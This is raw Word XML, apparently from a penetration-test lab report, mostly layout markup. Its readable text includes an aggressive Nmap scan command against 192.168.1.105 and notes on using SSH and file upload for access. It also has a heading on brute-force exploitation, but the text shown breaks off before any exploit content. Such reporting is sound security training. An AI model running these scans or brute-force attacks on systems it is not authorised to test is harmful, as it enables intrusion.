                              <a:gd name="T80" fmla="+- 0 13483 10081"/>
                              <a:gd name="T81" fmla="*/ T80 w 3825"/>
                              <a:gd name="T82" fmla="+- 0 524 487"/>
                              <a:gd name="T83" fmla="*/ 524 h 5122"/>
                              <a:gd name="T84" fmla="+- 0 13548 10081"/>
                              <a:gd name="T85" fmla="*/ T84 w 3825"/>
                              <a:gd name="T86" fmla="+- 0 551 487"/>
                              <a:gd name="T87" fmla="*/ 551 h 5122"/>
                              <a:gd name="T88" fmla="+- 0 13609 10081"/>
                              <a:gd name="T89" fmla="*/ T88 w 3825"/>
                              <a:gd name="T90" fmla="+- 0 586 487"/>
                              <a:gd name="T91" fmla="*/ 586 h 5122"/>
                              <a:gd name="T92" fmla="+- 0 13666 10081"/>
                              <a:gd name="T93" fmla="*/ T92 w 3825"/>
                              <a:gd name="T94" fmla="+- 0 627 487"/>
                              <a:gd name="T95" fmla="*/ 627 h 5122"/>
                              <a:gd name="T96" fmla="+- 0 13718 10081"/>
                              <a:gd name="T97" fmla="*/ T96 w 3825"/>
                              <a:gd name="T98" fmla="+- 0 673 487"/>
                              <a:gd name="T99" fmla="*/ 673 h 5122"/>
                              <a:gd name="T100" fmla="+- 0 13765 10081"/>
                              <a:gd name="T101" fmla="*/ T100 w 3825"/>
                              <a:gd name="T102" fmla="+- 0 725 487"/>
                              <a:gd name="T103" fmla="*/ 725 h 5122"/>
                              <a:gd name="T104" fmla="+- 0 13806 10081"/>
                              <a:gd name="T105" fmla="*/ T104 w 3825"/>
                              <a:gd name="T106" fmla="+- 0 782 487"/>
                              <a:gd name="T107" fmla="*/ 782 h 5122"/>
                              <a:gd name="T108" fmla="+- 0 13840 10081"/>
                              <a:gd name="T109" fmla="*/ T108 w 3825"/>
                              <a:gd name="T110" fmla="+- 0 844 487"/>
                              <a:gd name="T111" fmla="*/ 844 h 5122"/>
                              <a:gd name="T112" fmla="+- 0 13868 10081"/>
                              <a:gd name="T113" fmla="*/ T112 w 3825"/>
                              <a:gd name="T114" fmla="+- 0 909 487"/>
                              <a:gd name="T115" fmla="*/ 909 h 5122"/>
                              <a:gd name="T116" fmla="+- 0 13888 10081"/>
                              <a:gd name="T117" fmla="*/ T116 w 3825"/>
                              <a:gd name="T118" fmla="+- 0 978 487"/>
                              <a:gd name="T119" fmla="*/ 978 h 5122"/>
                              <a:gd name="T120" fmla="+- 0 13901 10081"/>
                              <a:gd name="T121" fmla="*/ T120 w 3825"/>
                              <a:gd name="T122" fmla="+- 0 1050 487"/>
                              <a:gd name="T123" fmla="*/ 1050 h 5122"/>
                              <a:gd name="T124" fmla="+- 0 13905 10081"/>
                              <a:gd name="T125" fmla="*/ T124 w 3825"/>
                              <a:gd name="T126" fmla="+- 0 1124 487"/>
                              <a:gd name="T127" fmla="*/ 1124 h 5122"/>
                              <a:gd name="T128" fmla="+- 0 13905 10081"/>
                              <a:gd name="T129" fmla="*/ T128 w 3825"/>
                              <a:gd name="T130" fmla="+- 0 5608 487"/>
                              <a:gd name="T131" fmla="*/ 5608 h 51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825" h="5122">
                                <a:moveTo>
                                  <a:pt x="3824" y="5121"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="637" y="5121"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="563" y="5117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="491" y="5104"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="422" y="5084"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357" y="5057"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="295" y="5022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="4981"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="186" y="4935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="4883"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99" y="4826"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="64" y="4764"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37" y="4699"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="4630"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4" y="4558"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="4484"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3187" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3261" y="4"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3333" y="16"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3402" y="37"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3467" y="64"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3528" y="99"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3585" y="140"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3637" y="186"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3684" y="238"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3725" y="295"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3759" y="357"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3787" y="422"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3807" y="491"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3820" y="563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3824" y="637"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3824" y="5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5" y="-720"/>
                            <a:ext cx="9065" cy="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D31B9E" id="Group 103" o:spid="_x0000_s1053" style="position:absolute;left:0;text-align:left;margin-left:21.2pt;margin-top:-35.95pt;width:688.3pt;height:331.2pt;z-index:-16140288;mso-position-horizontal-relative:page" coordorigin="424,-719" coordsize="13766,6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">
                <v:line id="Line 108" o:spid="_x0000_s1054" style="position:absolute;visibility:visible;mso-wrap-style:square" from="432,5880" to="13968,5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" strokecolor="#a8b6bf"/>
                <v:shape id="AutoShape 107" o:spid="_x0000_s1055" style="position:absolute;left:765;top:-562;width:8565;height:6459;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8565,6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" path="m4206,6459r,-5758l4202,625r-12,-74l4170,480r-27,-68l4110,347r-39,-60l4025,231r-50,-50l3919,135,3859,96,3794,62,3726,36,3655,16,3581,4,3505,,,,,5758r4,76l16,5908r20,71l63,6047r33,64l135,6172r46,55l231,6278r56,45l347,6363r65,33l480,6423r71,19l625,6454r76,5l4206,6459xm8565,6015r,-4330l8561,1611r-13,-72l8528,1470r-28,-65l8466,1343r-41,-57l8378,1234r-52,-47l8269,1147r-61,-35l8143,1085r-69,-21l8002,1052r-74,-5l4741,1047r,4330l4745,5452r12,71l4778,5592r27,66l4840,5719r41,57l4927,5828r52,47l5036,5915r62,35l5163,5978r69,20l5304,6010r74,5l8565,6015xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4206,139;4190,-11;4143,-150;4071,-275;3975,-381;3859,-466;3726,-526;3581,-558;0,-562;4,5272;36,5417;96,5549;181,5665;287,5761;412,5834;551,5880;701,5897;8565,5453;8561,1049;8528,908;8466,781;8378,672;8269,585;8143,523;8002,490;4741,485;4745,4890;4778,5030;4840,5157;4927,5266;5036,5353;5163,5416;5304,5448;8565,5453" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 106" o:spid="_x0000_s1056" type="#_x0000_t202" style="position:absolute;left:5125;top:-720;width:9065;height:6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15BCBD00" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="28"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="04AB6C11" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="28"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="3F5D6B18" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="28"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="7DE243EB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:spacing w:before="4"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="27"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="6C548428" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="1"/>
                          <w:ind w:left="665"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Achievements</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="015EE10E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="38" w:line="276" w:lineRule="auto"/>
                          <w:ind w:left="665" w:right="496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 did the exploit achieve? For example: Did it grant you a user shell, root access, etc.?</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Freeform 105" o:spid="_x0000_s1057" style="position:absolute;left:10080;top:486;width:3825;height:5122;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3825,5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" path="m3824,5121r-3187,l563,5117r-72,-13l422,5084r-65,-27l295,5022r-57,-41l186,4935r-46,-52l99,4826,64,4764,37,4699,16,4630,4,4558,,4484,,,3187,r74,4l3333,16r69,21l3467,64r61,35l3585,140r52,46l3684,238r41,57l3759,357r28,65l3807,491r13,72l3824,637r,4484xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3824,5608;637,5608;563,5604;491,5591;422,5571;357,5544;295,5509;238,5468;186,5422;140,5370;99,5313;64,5251;37,5186;16,5117;4,5045;0,4971;0,487;3187,487;3261,491;3333,503;3402,524;3467,551;3528,586;3585,627;3637,673;3684,725;3725,782;3759,844;3787,909;3807,978;3820,1050;3824,1124;3824,5608" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Picture 104" o:spid="_x0000_s1058" type="#_x0000_t75" style="position:absolute;left:5125;top:-720;width:9065;height:6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 w:rsidR="006B15D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>Tools &amp; Processes</w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using aggressive Nmap scan </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nmap –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –A 192.168.1.105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67138403" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="7"/>
        <w:ind w:left="1105"/>
      </w:pPr>
      <w:r>
        <w:t>I found out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BC6318" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1358"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Types </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of ports are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</w:p>
    <w:p w14:paraId="40328129" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1363"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:ind w:left="1362" w:hanging="258"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>What services are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91DC08" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1363"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:ind w:left="1362" w:hanging="258"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Various critical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B30C74" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F18733" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:ind w:left="1914"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>Achievements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC66D3" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="43" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="1105" w:right="9684"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>All of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the above can be used in order to gain further access. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 22 can be used to SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">into a user, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>port 80 can be used to upload malicious ﬁles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F618870" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="24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3BBC1E15" w14:textId="2564E304" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:spacing w:before="23"/>
        <w:ind w:left="457" w:right="271"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz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04736" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DD741DC" wp14:editId="215718F3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112" name="Lin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ABB77F" id="Line 102" o:spid="_x0000_s1026" style="position:absolute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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Exploitation using the Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADAECF6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC17154" w14:textId="7BD10C87" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="423"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pP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36065702" wp14:editId="6F1460C3">
                <wp:extent cx="3188335" cy="4105910"/>
                <wp:effectExtent l="8255" t="2540" r="3810" b="0"/>
                <wp:docPr id="10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8335" cy="4105910"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5021" cy="6466"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="109" name="Freeform 10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021" cy="6373"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 5020 w 5021"/>
                              <a:gd name="T1" fmla="*/ 6373 h 6373"/>
                              <a:gd name="T2" fmla="*/ 837 w 5021"/>
                              <a:gd name="T3" fmla="*/ 6373 h 6373"/>
                              <a:gd name="T4" fmla="*/ 761 w 5021"/>
                              <a:gd name="T5" fmla="*/ 6370 h 6373"/>
                              <a:gd name="T6" fmla="*/ 686 w 5021"/>
                              <a:gd name="T7" fmla="*/ 6359 h 6373"/>
                              <a:gd name="T8" fmla="*/ 614 w 5021"/>
                              <a:gd name="T9" fmla="*/ 6343 h 6373"/>
                              <a:gd name="T10" fmla="*/ 545 w 5021"/>
                              <a:gd name="T11" fmla="*/ 6321 h 6373"/>
                              <a:gd name="T12" fmla="*/ 478 w 5021"/>
                              <a:gd name="T13" fmla="*/ 6292 h 6373"/>
                              <a:gd name="T14" fmla="*/ 414 w 5021"/>
                              <a:gd name="T15" fmla="*/ 6259 h 6373"/>
                              <a:gd name="T16" fmla="*/ 354 w 5021"/>
                              <a:gd name="T17" fmla="*/ 6220 h 6373"/>
                              <a:gd name="T18" fmla="*/ 298 w 5021"/>
                              <a:gd name="T19" fmla="*/ 6176 h 6373"/>
                              <a:gd name="T20" fmla="*/ 245 w 5021"/>
                              <a:gd name="T21" fmla="*/ 6128 h 6373"/>
                              <a:gd name="T22" fmla="*/ 197 w 5021"/>
                              <a:gd name="T23" fmla="*/ 6075 h 6373"/>
                              <a:gd name="T24" fmla="*/ 153 w 5021"/>
                              <a:gd name="T25" fmla="*/ 6019 h 6373"/>
                              <a:gd name="T26" fmla="*/ 114 w 5021"/>
                              <a:gd name="T27" fmla="*/ 5958 h 6373"/>
                              <a:gd name="T28" fmla="*/ 81 w 5021"/>
                              <a:gd name="T29" fmla="*/ 5895 h 6373"/>
                              <a:gd name="T30" fmla="*/ 52 w 5021"/>
                              <a:gd name="T31" fmla="*/ 5828 h 6373"/>
                              <a:gd name="T32" fmla="*/ 30 w 5021"/>
                              <a:gd name="T33" fmla="*/ 5759 h 6373"/>
                              <a:gd name="T34" fmla="*/ 14 w 5021"/>
                              <a:gd name="T35" fmla="*/ 5687 h 6373"/>
                              <a:gd name="T36" fmla="*/ 3 w 5021"/>
                              <a:gd name="T37" fmla="*/ 5612 h 6373"/>
                              <a:gd name="T38" fmla="*/ 0 w 5021"/>
                              <a:gd name="T39" fmla="*/ 5536 h 6373"/>
                              <a:gd name="T40" fmla="*/ 0 w 5021"/>
                              <a:gd name="T41" fmla="*/ 0 h 6373"/>
                              <a:gd name="T42" fmla="*/ 4184 w 5021"/>
                              <a:gd name="T43" fmla="*/ 0 h 6373"/>
                              <a:gd name="T44" fmla="*/ 4260 w 5021"/>
                              <a:gd name="T45" fmla="*/ 3 h 6373"/>
                              <a:gd name="T46" fmla="*/ 4334 w 5021"/>
                              <a:gd name="T47" fmla="*/ 13 h 6373"/>
                              <a:gd name="T48" fmla="*/ 4406 w 5021"/>
                              <a:gd name="T49" fmla="*/ 30 h 6373"/>
                              <a:gd name="T50" fmla="*/ 4476 w 5021"/>
                              <a:gd name="T51" fmla="*/ 52 h 6373"/>
                              <a:gd name="T52" fmla="*/ 4542 w 5021"/>
                              <a:gd name="T53" fmla="*/ 81 h 6373"/>
                              <a:gd name="T54" fmla="*/ 4606 w 5021"/>
                              <a:gd name="T55" fmla="*/ 114 h 6373"/>
                              <a:gd name="T56" fmla="*/ 4666 w 5021"/>
                              <a:gd name="T57" fmla="*/ 153 h 6373"/>
                              <a:gd name="T58" fmla="*/ 4723 w 5021"/>
                              <a:gd name="T59" fmla="*/ 197 h 6373"/>
                              <a:gd name="T60" fmla="*/ 4775 w 5021"/>
                              <a:gd name="T61" fmla="*/ 245 h 6373"/>
                              <a:gd name="T62" fmla="*/ 4824 w 5021"/>
                              <a:gd name="T63" fmla="*/ 298 h 6373"/>
                              <a:gd name="T64" fmla="*/ 4867 w 5021"/>
                              <a:gd name="T65" fmla="*/ 354 h 6373"/>
                              <a:gd name="T66" fmla="*/ 4906 w 5021"/>
                              <a:gd name="T67" fmla="*/ 414 h 6373"/>
                              <a:gd name="T68" fmla="*/ 4940 w 5021"/>
                              <a:gd name="T69" fmla="*/ 478 h 6373"/>
                              <a:gd name="T70" fmla="*/ 4968 w 5021"/>
                              <a:gd name="T71" fmla="*/ 545 h 6373"/>
                              <a:gd name="T72" fmla="*/ 4990 w 5021"/>
                              <a:gd name="T73" fmla="*/ 614 h 6373"/>
                              <a:gd name="T74" fmla="*/ 5007 w 5021"/>
                              <a:gd name="T75" fmla="*/ 686 h 6373"/>
                              <a:gd name="T76" fmla="*/ 5017 w 5021"/>
                              <a:gd name="T77" fmla="*/ 761 h 6373"/>
                              <a:gd name="T78" fmla="*/ 5020 w 5021"/>
                              <a:gd name="T79" fmla="*/ 837 h 6373"/>
                              <a:gd name="T80" fmla="*/ 5020 w 5021"/>
                              <a:gd name="T81" fmla="*/ 6373 h 6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5021" h="6373">
                                <a:moveTo>
                                  <a:pt x="5020" y="6373"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="837" y="6373"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="761" y="6370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="686" y="6359"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="614" y="6343"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="545" y="6321"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="478" y="6292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="414" y="6259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="354" y="6220"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="298" y="6176"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="245" y="6128"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="6075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="153" y="6019"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114" y="5958"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="81" y="5895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52" y="5828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30" y="5759"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14" y="5687"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3" y="5612"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="5536"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4184" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4260" y="3"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4334" y="13"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4406" y="30"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4476" y="52"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4542" y="81"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4606" y="114"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4666" y="153"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4723" y="197"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4775" y="245"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4824" y="298"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4867" y="354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4906" y="414"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4940" y="478"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4968" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4990" y="614"/>
                                </a:lnTo>
                                <a:lnTo>
